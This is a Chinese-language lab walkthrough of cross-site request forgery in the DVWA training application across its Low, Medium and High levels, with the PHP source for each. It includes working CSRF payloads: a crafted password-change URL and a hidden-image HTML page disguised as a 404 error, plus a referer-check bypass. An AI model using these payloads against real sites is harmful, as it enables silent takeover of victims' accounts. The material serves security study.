DVWA之CSRF学习
DVWA之CSRF学习
CSRF攻击过程及分析
Low级别
首先,抓包看一下改密码的传输都有哪些
得知URL为:
http://用户的ip/DVWA-1.9/vulnerabilities/csrf/?password_new=输的新密码&password_conf=输的确认密码&Change=Change#
当用户A在访问该网站时,只要用户A点击黑客B精心构造的这个URL时就能造成CSRF攻击
构造链接:http://192.168.244.131/DVWA-1.9/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#
LOW级别源码如下:
<?php
if( isset(
$_GET
[
'Change'
] ) ) {
// Get input
$pass_new
=
$_GET
[
'password_new'
];
$pass_conf
=
$_GET
[
'password_conf'
];
// Do the passwords match?
if(
$pass_new
==
$pass_conf
) {
// They do!
$pass_new
=
mysql_real_escape_string
(
$pass_new
);
$pass_new
=
md5
(
$pass_new
);
// Update the database
$insert
=
"UPDATE `users` SET password = '
$pass_new
' WHERE user = '"
.
dvwaCurrentUser
() .
"';"
;
$result
=
mysql_query
(
$insert
) or die(
'<pre>'
.
mysql_error
() .
'</pre>'
);
// Feedback for the user
echo
"<pre>Password Changed.</pre>"
;
}
else {
// Issue with passwords matching
echo
"<pre>Passwords did not match.</pre>"
;
}
mysql_close
();
}
?>
发现以上源码并没有加入任何的过滤和验证,所以可以说是没有防护
当然,这个URL过于明显,稍微有一点知识的人都能看出来这是一个改密码的链接,所以说我们就应该想一下隐藏的放法,比如构造一个HTML文档
文档如下:
Test.html
<imgsrc=" http://192.168.244.131/DVWA-1.9/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#"border="0"style="display:none;"/>
<h1>404<h1>
<h2>file notfound.<h2>
其中style="display:none;"是不让这个元素显示出来
当用户打开这个HTML时,以为这是个错误的页面,一般不会在意,但是这样就能把用户的密码改掉了,
发现密码错误
再试一下改过的密码
登陆成功
Medium CSRF
同样,我们先抓包看一下改密码的请求有什么不同
看一下它的源码:
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Checks to see where the request came from
if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = mysql_real_escape_string( $pass_new );
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
}
else {
// Didn't come from a trusted source
echo "<pre>That request didn't look correct.</pre>";
}
mysql_close();
}
?>
发现源码里多了一个这样的对比: if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )
是匹配主机名字的,如果主机名与发起请求的名字一样的时候,就可以完成改密码的攻击
那么我们可以构造这样的一个HTML 用户A的主机IP地址为192.168.244.131
192.168.244.131.html 这个网页需要放在攻击者的服务器中
内容如下:
<imgsrc="http://192.168.244.131/DVWA-1.9/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#"border="0" style="display:none;"/>
<h1>404<h1>
<h2>file not found.<h2>
其中style="display:none;"是不让这个元素显示出来
我们把这个文件放在攻击主机上网站根目录下
然后在攻击主机上去访问这个文件
当用户在用密码password登录时发现已经登不上去了
High CSRF
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = mysql_real_escape_string( $pass_new );
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
mysql_close();
}
// Generate Anti-CSRF token
generateSessionToken();
?>